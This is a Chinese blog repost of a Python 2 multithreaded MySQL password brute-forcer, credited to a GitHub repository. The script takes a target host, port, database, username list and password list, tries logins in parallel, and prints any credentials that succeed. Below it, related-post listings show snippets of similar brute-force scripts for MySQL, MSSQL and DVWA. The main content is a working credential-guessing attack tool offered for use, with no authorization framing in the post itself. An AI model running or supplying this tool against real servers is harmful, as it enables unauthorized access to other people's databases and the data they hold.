爆破mysql账号密码的python脚本

最新推荐文章于 2024-05-17 16:05:52 发布
最新推荐文章于 2024-05-17 16:05:52 发布
阅读量558 收藏 1
点赞数
分类专栏: 渗透测试工具 文章标签: MySQL 暴力破解 多线程 Python 密码破解
原文链接:https://github.com/wooyunwang/crack-mysql
版权 
# -*- coding: utf-8 -*-

import os, sys, re, socket, time
from functools import partial
from multiprocessing.dummy import Pool as ThreadPool

try:
    import MySQLdb
except ImportError:
    print '\n[!] MySQLdb模块导入错误,请到下面网址下载:'
    print '[!] http://www.codegood.com/archives/129'
    exit()


def usage():
    print '+' + '-' * 90 + '+'
    print '\t\t\t   Python MySQL暴力破解工具多线程版'
    print '\t\t\t  Blog:http://github.com/wooyunwang/'
    print '\t\t\t\t   Code BY: Jason'
    print '\t\t\t\t   Time:2019-11-11'
    print '+' + '-' * 90 + '+'
    if len(sys.argv) != 6:
        print "用法: " + os.path.basename(sys.argv[0]) + " 待破解的ip/domain 端口 数据库 用户名列表 密码列表"
        print "实例: " + os.path.basename(sys.argv[0]) + "   www.minsv.com   3306  mysql  user.txt  pass.txt"
        sys.exit()


def mysql_brute(user, password):
    "mysql数据库破解函数"
    db = None
    try:
        # print "user:", user, "password:", password
        db = MySQLdb.connect(host=host, user=user, passwd=password, db=sys.argv[3], port=int(sys.argv[2]))
        # print '[+] 破解成功:', user, password
        result.append('用户名:' + user + "\t密码:" + password)
    except KeyboardInterrupt:
        print '按您的吩咐,已成功退出程序!'
        exit()
    except MySQLdb.Error, msg:
        # print '未知错误:', msg
        pass
    finally:
        if db:
            db.close()


if __name__ == '__main__':
    usage()
    start_time = time.time()
    if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):
        host = sys.argv[1]
    else:
        host = socket.gethostbyname(sys.argv[1])
    userlist = [i.rstrip() for i in open(sys.argv[4])]
    passlist = [j.rstrip() for j in open(sys.argv[5])]
    print '\n[+] 目  标:%s \n' % sys.argv[1]
    print '[+] 用户名:%d 条\n' % len(userlist)
    print '[+] 密  码:%d 条\n' % len(passlist)
    print '[!] 密码破解中,请稍候……\n'
    result = []

    for user in userlist:
        partial_user = partial(mysql_brute, user)
        pool = ThreadPool(10)
        pool.map(partial_user, passlist)
        pool.close()
        pool.join()
    if len(result) != 0:
        print '[+] 恭喜,MySQL密码破解成功!\n'
        for x in {}.fromkeys(result).keys():
            print x + '\n'
    else:
        print '[-] 杯具了,MySQL密码破解失败!\n'
    print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)
© 2022 GitHub, Inc.
Terms
Privacy
Security
Status
Docs
Conta

所有代码获取地址:https://github.com/wooyunwang/crack-mysql

网络安全进阶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PythonMysql爆破脚本
01-19
Mysql Python版本爆破脚本,需要安装Python插件MySQL-python.exe,可以看出代码量很少,(注意:里用户名和密码都是类似字典。用法:保存代码为MysqlDatabaseBlasting.py,cmd切换到 MysqlDatabaseBlasting.py路径下,并 执行 MysqlDatabaseBlasting.py即可开始破解 ) import MySQLdb #coding=gbk #目标IP mysql数据库必须开启3360远程登陆端口 mysql_username = ('root','test', 'admin', 'user')#账号字典 commo
MySQL账号密码爆破工具JAVA开发
最新发布
07-21
基于Java SE实现的MySQL账号、密码爆破工具 使用的技术:Java线程池、多线程、终端交互 适用场景:适合在授权下对目标MySQL进行弱口令检测 注意:请在授权下对目标进行测试
Mysql账号密码在线爆破脚本(PHP)
小赵同学的博客
02-20 1558
用法:保存为Completion.php文件,将密码字典放置同目录下为pwd.txt文件,浏览器打开就可使用。 <html> <head> <title>Mysql账号密码在线爆破工具</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <center> &l
Python 渗透测试:MySQL 数据库 弱密码测试.(3306 端口)
网络安全领域___专研者.
05-17 695
MySQL 是一种开源的关系型数据库管理系统(RDBMS)。它是目前世界上最流行的数据库之一,被广泛应用于各种类型的网站和应用程序中。MySQL 数据库爆破是一种非法和危险的黑客攻击手段。它指的是通过暴力猜测密码的方式,试图获取未授权访问 MySQL 数据库的行为。
python mysql数据库爆破_python 构造mysql爆破
weixin_39945871的博客
12-06 153
importpymysqlimportoptparseimportosimportconfigparserdefmain():parser=optparse.OptionParser()parser.add_option('-u',dest='username',help='MySQL username of blasting')parser.add_option('-p',dest='passw...
mysql爆破python脚本
m0_73896875的博客
07-06 251
print(f"成功登录 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"登录失败 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"成功登录 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"登录失败 - 主机名:{hostname},用户名:{username},密码:{password}")@Author :星之尘。
全国职业技能大赛信息安全管理与评估-MySQL爆破脚本
weixin_30664615的博客
06-08 344
DEMO: #coding=utf-8 import MySQLdb class MSSQL: def __init__(self,host,user,pwd): self.host = host self.user = user self.pwd = pwd d...
Python脚本暴力破解栅栏密码
01-21
今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。 方法一(通用脚本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串\n‘) elen = len(e...
mysql 批量3306 爆破源码 python
12-18
mysql 批量3306 爆破源码 python
python之——使用python编写爆破脚本
12-21
每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url="http://localhost/DVWA-master/vulnerabilities/brute/" req=urllib2....
PHP版Mysql爆破脚本
09-09
本文给大家分享的是使用php实现暴力破解mysql的小脚本代码,非常的好用,有需要的小伙伴可以参考下
Python版Mssql爆破脚本
09-09
本文给大家分享的是使用Python实现的暴力破解mssql用户密码的脚本的代码,配合上合适的字典非常好用,有需要的小伙伴可以参考下
利用python爆破mysql数据库
qq_52344654的博客
12-08 3064
使用python爆破mysql的操作
python 构造mysql爆破
weixin_30457881的博客
07-06 403
前言: 今天已经期末考完,睡了个觉起床写了个 mysql爆破器. 思路: 1.爆破用户->用户存在的话不会报错反之报错 2.爆破密码->密码正确不会报错反之报错 3.用户名和密码一起爆破->用户名和密码正确不会报错反之报错 用到的模块: optparser pymysql configparser os 代码: import pymysql ...
Python写了个工具,完美破解了MySQL!!(建议收藏)
热门推荐
冰河的专栏
07-01 4万+
再也不怕忘记MySQL的用户名和密码了,用这个工具可以秒破MySQL,冰河强烈建议收藏!!
mysql 密码注入_简单sql注入与密码爆破
weixin_42126274的博客
02-27 1382
简介:Day3的练习题和作业简单sql注入(自己搭建一个页面注入)页面搭建使用phpstudy,在WWW目录的index.php中进行代码修改在localhost界面下,即127.0.0.1打开默认显示index.php的页面该页面有如下要求:使用Post方法传递参数链接之前自己已生成的数据库字符型注入页面,要求是post传递的参数,输入id,显示username,age,sex代码如下:1234...
python脚本爆破dvwa
09-23
Python脚本可以用于爆破DVWA(Damn Vulnerable Web Application)的安全漏洞,例如密码爆破和SQL注入。对于密码爆破,可以使用Python脚本来尝试不同的密码组合,直到找到正确的密码。对于SQL注入,Python脚本可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值